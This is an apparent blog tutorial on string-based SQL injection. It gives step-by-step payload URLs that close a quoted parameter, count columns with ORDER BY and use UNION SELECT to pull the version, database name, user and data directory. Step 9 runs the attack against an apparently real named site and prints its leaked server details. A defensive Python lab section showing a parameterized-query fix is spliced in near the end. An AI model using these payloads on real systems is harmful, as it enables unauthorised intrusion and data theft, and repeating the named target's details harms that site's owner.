Thursday, 29 May 2014

ORDER BY DOES NOT WORK?


Let's get it on.


I have no knowledge of SQL injection; is this tutorial useful?

No, I suggest you read some tutorials on union-based SQL injection before attempting this technique.

When should I read/use this tutorial?

You should use this tutorial when you are stuck at the 'order by' command and it gives you NO error.

Problem: You have a site which gives you an SQL error, but when you perform "order by" you don't get any errors.

Then you are probably going to have to use 'string-based injection'.

Here is how this works.

1.
We try this site:

Code:
http://www.target.co.uk/products.php?id=6'

Which gives us the Error:

Code:
There was an error, please try again later. Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6'' ORDER BY orderID LIMIT 0, 3' at line 1

2.

Now we know it's vulnerable, so we move on to the 'order by' command.


Code:
http://www.target.co.uk/products.php?id=6 order by 1--

This gives us a normal page.

3.
We now try a large number with the 'order by', like this:

Code:
http://www.target.co.uk/products.php?id=6 order by 1000--

Hmm, still no error.

4.
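We will now make some changes to the syntax.
We will put a ' after 6 and a + after the hyphens (--).
The error message in step 1 shows that the id value sits inside single quotes in the query, so the ' closes that string; the + is a URL-encoded space, which MySQL requires after -- before it treats the rest of the line as a comment.

Our syntax now looks like this: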


Code:
http://www.target.co.uk/products.php?id=6' order by 1--+

This request gives us no error, which is good.

5.
Now we try the same syntax, but with a larger number:

Code:
http://www.target.co.uk/products.php?id=6' order by 1000--+

Finally, this gives us this error:

Code:
There was an error, please try again later. Error: Unknown column '1000' in 'order clause'

6.
Now we would like to find the column count. Just like in union-based injection, we try something like:


Code:
http://www.target.co.uk/products.php?id=6' order by 13--+

No error, which means the column count is higher than 13 (you know the deal).


7.
Now we try:


Code:
http://www.target.co.uk/products.php?id=6' order by 14--+

Which gives us the error:

Code:
There was an error, please try again later. Error: Unknown column '14' in 'order clause'

8.
Now the injection works just like in 'union-based' injection.


Code:
http://www.target.co.uk/products.php?id=-6' union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+

The output is:

Code:
There was an error, please try again later.
2
6
Read More...

4

Page 1     1 |




9.
Now, you hack it.

Code:
http://www.matrixinnovations.co.uk/products.php?id=-6' union select 1,concat(version(),0x3a,database(),0x3a,user(),0x3a,@@datadir),3,4,5,6,7,8,9,10,​11,12,13--+

Output:
Code:
There was an error, please try again later.
5.1.56-community-log:web183-newmatrix:web183-newmatrix@79.170.40.183:/var/lib/mysql/
6
Read More...
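
For anyone defending an application like this one, here is the same behaviour reproduced in a lab, as an added example that is not part of the original tutorial or the site's code. It uses Python's sqlite3 as a stand-in for MySQL; the table, column and function names are assumptions, and the probes are the decoded id values from steps 1, 3 and 5. The 'before' function builds the query the way the error message in step 1 implies (value pasted inside quotes, database error echoed back); the 'after' function shows the fix.

```python
import sqlite3

GENERIC = "There was an error, please try again later."

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, orderID INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(6, "widget", 1), (7, "gadget", 2)])
    return db

def lookup_vulnerable(db, raw_id):
    # 'Before': input is pasted inside a quoted literal and the raw
    # database error is echoed to the client, as on the site in the post.
    sql = ("SELECT id, name FROM products WHERE id = '" + raw_id +
           "' ORDER BY orderID LIMIT 0, 3")
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"{GENERIC} Error: {exc}"

def lookup_hardened(db, raw_id):
    # 'After': reject non-integers, bind the value as a parameter so it can
    # never change the statement, and keep database errors out of the response.
    try:
        product_id = int(raw_id)
    except ValueError:
        return []
    try:
        return db.execute("SELECT id, name FROM products WHERE id = ? "
                          "ORDER BY orderID LIMIT 0, 3", (product_id,)).fetchall()
    except sqlite3.Error:
        return GENERIC  # log the detail server-side instead

# Decoded id values from steps 1, 3 and 5 ('+' in a URL decodes to a space).
PROBES = ["6'", "6 order by 1000-- ", "6' order by 1000-- "]

def demo():
    db = make_db()
    return {p: (lookup_vulnerable(db, p), lookup_hardened(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (before, after) in demo().items():
        print(repr(probe), "| vulnerable:", before, "| hardened:", after)
```

The unquoted step 3 value produces no error in the vulnerable version because it stays inside the string literal; MySQL would coerce it to 6 and show the normal page, while SQLite simply matches no rows. The hardened version returns an empty result for all three probes and never exposes a database error.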

I hope you liked my tutorial; if you have any questions, feel free to post.

Happy hacking.
